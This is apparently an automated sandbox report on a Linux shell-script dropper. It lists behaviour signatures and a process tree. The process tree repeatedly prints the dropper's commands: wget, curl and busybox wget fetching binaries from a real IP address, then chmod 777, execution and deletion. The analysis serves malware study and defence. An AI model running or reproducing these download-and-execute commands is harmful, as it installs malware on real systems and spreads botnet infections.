Analysis Overview
SHA256
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
Threat Level: Shows suspicious behavior
The file 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 02:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
31s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
